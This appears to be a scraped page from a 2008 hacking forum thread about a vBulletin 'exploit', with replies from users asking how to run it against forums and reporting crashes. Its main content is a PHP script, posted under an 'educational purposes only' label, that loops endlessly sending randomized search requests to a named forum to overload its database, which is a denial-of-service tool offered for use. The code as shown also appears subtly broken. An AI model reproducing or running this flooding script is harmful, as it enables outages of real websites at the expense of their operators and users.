New !! Vbulletin Exploit [All Versions] - Page 3

Fedepitolargo · 07-02-2008

Thanks! Digi u are great!

silent_hill · 07-09-2008

working ....but i can see the website crashed only in my pc...my freinds no...

illegal-city · 07-09-2008

Is this a exploit, id describe it more of MYSQL DDOS.

I wrote a PHP version with CURL.
Not Tested, but uses code I allways use, so should work.
---------

For Educational Purposes Only:

Code:

<?

function make_seed(){
  list($usec, $sec) = explode(' ', microtime());
  return (float) $sec + ((float) $usec * 100000);
}


function docurl($url){
	$ch = curl_init();
	curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);
	curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_HEADER, FALSE);
		curl_setopt($ch, CURLOPT_REFERER, "http://www.google.com"); 
	ob_start();
	ob_end_clean();
	curl_close ($ch);
}


$forumurl = "http://www.hardforum.com/"; //Example http://www.hardforum.com/
$userprefix = "haxor"; //Any Username
$searchqerya = "search.php?s=&do=process&query=";
$searchqueryb = "&titleonly=0&starteronly=0&exactname=1&replyless=0&replylimit=3&searchdate =1&beforeafter=before&sortby=title&order=descending&showposts=1&forumchoice[]=0&childforums=1&dosearch=Search Now";

$i = 0;
while(1) {
	srand(make_seed());
	$randval = rand();
	$url = $forumurl.$searchqerya.$userprefix.$randval.$searchqueryb;
	docurl($url);
	$i++;
	echo $i.' ddosed<br>';
}
?>

Unsure, but i belive it would be more effective if usernames rotated between forums top users. Therefore more for mysql to return.
(P.S. DONT TARGET MY FORUM!!! lol)

^Predator · 07-10-2008

I don't know what to write after this? Maybe forum url?

silent_hill · 07-12-2008

first rename the file to anyname.pl no anyname.pl.txt

I hope that help you

^Predator · 07-13-2008

Same thing man.

maiku420 · 07-16-2008

thank u all for code as well as screen shots

**cagbaazee** · 07-17-2008

are u sure it will crash all forum
Do reply.

silent_hill · 07-17-2008

i think not all.i think only vb websites that have a limited trafic and VB's not modified

Raulz · 07-17-2008

CooL poSt

07-02-2008	#21 (permalink)
Fedepitolargo Member Join Date: Jun 2008 Location: Argentina Posts: 97 Thanks: 6 Thanked 3 Times in 3 Posts Rep Power: 23	Thanks! Digi u are great! __________________ To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts. To view links or images in signatures your post count must be 10 or greater. You currently have 0 posts.

LinkBacks (?) LinkBack to this Thread: http://www.badhackerz.com/exploit-codes/10597-new-vbulletin-exploit-all-versions.html
Posted By	For	Type	Date
Digg - New !! Vbulletin Exploit [All Versions]	This thread	Refback	06-20-2008 08:03 AM
Badhackerz... Ethical hackers - Powered by vBulletin	This thread	Refback	06-17-2008 02:43 AM

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Similar Threads
Thread	Thread Starter	Forum	Replies	Last Post
vBulletin <= 3.7.0 XSS Exploit (ajax.php - ajaxReg mod)	Armageddon	Exploit Codes	5	2 Weeks Ago 07:43 AM
Vbulletin Latest exploit not mine	RampageX11	Exploit Codes	8	11-09-2008 02:23 PM
The Egyptians {ALL VERSIONS}	Insurrection	Sony Ericsson File Downloads	0	08-04-2008 02:09 PM
ibProArcade 2.x module (vBulletin/IPB) Remote SQL Injection Exploit	MaDHA¢KeR™	Exploit Codes	0	08-02-2008 03:16 PM

07-09-2008	#22 (permalink)
silent_hill Leecher Join Date: Jun 2008 Posts: 14 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 22	working ....but i can see the website crashed only in my pc...my freinds no...

07-10-2008	#24 (permalink)
^Predator Junior Member Join Date: Jul 2008 Posts: 31 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 20	I don't know what to write after this? Maybe forum url?

07-12-2008	#25 (permalink)
silent_hill Leecher Join Date: Jun 2008 Posts: 14 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 22	first rename the file to anyname.pl no anyname.pl.txt I hope that help you

07-13-2008	#26 (permalink)
^Predator Junior Member Join Date: Jul 2008 Posts: 31 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 20	Same thing man.

07-16-2008	#27 (permalink)
maiku420 Junior Member Join Date: Apr 2008 Posts: 21 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 29	thank u all for code as well as screen shots

07-17-2008	#28 (permalink)
cagbaazee Junior Member Join Date: Jun 2008 Posts: 32 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 22	are u sure it will crash all forum Do reply.

07-17-2008	#29 (permalink)
silent_hill Leecher Join Date: Jun 2008 Posts: 14 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 22	i think not all.i think only vb websites that have a limited trafic and VB's not modified

07-17-2008	#30 (permalink)
Raulz Junior Member Join Date: Jun 2008 Posts: 11 Thanks: 0 Thanked 0 Times in 0 Posts Rep Power: 23	CooL poSt

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)